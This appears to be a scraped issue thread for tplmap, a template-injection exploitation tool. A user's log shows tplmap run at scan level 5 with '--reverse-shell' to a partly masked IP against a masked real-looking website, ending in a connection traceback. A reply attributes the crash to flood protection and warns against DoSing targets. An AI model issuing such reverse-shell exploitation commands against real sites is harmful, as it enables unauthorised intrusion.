Comments (2)
more info
:/opt/tplmap/tplmap$ sudo python ./tplmap.py -u "https://www.xxxx.de/bxxxxxr/hxxxxg/ixxo/[email protected]\z\`z'z"\" --level=5 -e mako --reverse-shell 82.246.2**.** 64917
[sudo] Mot de passe de fakessh :
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'query' is injectable
[+] Mako plugin is testing rendering with tag '${}'
[+] Mako plugin is testing } code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[!][tplmap] Exiting: ('Connection aborted.', BadStatusLine("''",))
Traceback (most recent call last):
File "./tplmap.py", line 26, in
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 135, in check_template_injection
current_plugin = detect_template_injection(channel)
File "/opt/tplmap/tplmap/core/checks.py", line 126, in detect_template_injection
current_plugin.detect()
File "/opt/tplmap/tplmap/core/plugin.py", line 65, in detect
self._detect_render()
File "/opt/tplmap/tplmap/core/plugin.py", line 275, in _detect_render
suffix = suffix
File "/opt/tplmap/tplmap/core/plugin.py", line 363, in render
blind = blind
File "/opt/tplmap/tplmap/core/plugin.py", line 317, in inject
result = self.channel.req(injection)
File "/opt/tplmap/tplmap/core/channel.py", line 285, in req
verify = False
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 473, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))
fakessh@fakessh:/opt/tplmap/tplmap$
from tplmap.
This happens because the --level 5
scan level send a large number of requests and the server kills the connections due to some flood request protection. Be careful to avoid dossing your targets.
from tplmap.
Related Issues (20)
- Twig plugin blind injection exception - crash HOT 2
- 'bool' object has no attribute 'replace' HOT 5
- module 'collections' has no attribute 'Mapping' HOT 8
- requests module download faile
- Unable to detect SSTI
- Node test container not building
- Problem installing in kali HOT 8
- doesn't support python3.10.9 HOT 5
- Getting error: Name 'GuiderQuest' is not defined even though it is global and i think it is all right? Help please.
- module 'collections' has no attribute 'Mapping' HOT 2
- Not working properly showing bool object no atribute replace error while runninng HOT 1
- Is this awesome tools provide witting a log?
- 3 arguments ? HOT 1
- target shell can't move to other file ,is it normal? HOT 1
- Traceback (most recent call last): File "./tplmap.py", line 3, in <module> HOT 5
- Why can't my cookie be configured normally
- ISSUE AGAIN
- Can't SSTI injection through cookie value
- Traceback (most recent call last): File "tplmap.py", line 2, in <module> HOT 4
- ERROR: No matching distribution found for PyYaml HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from tplmap.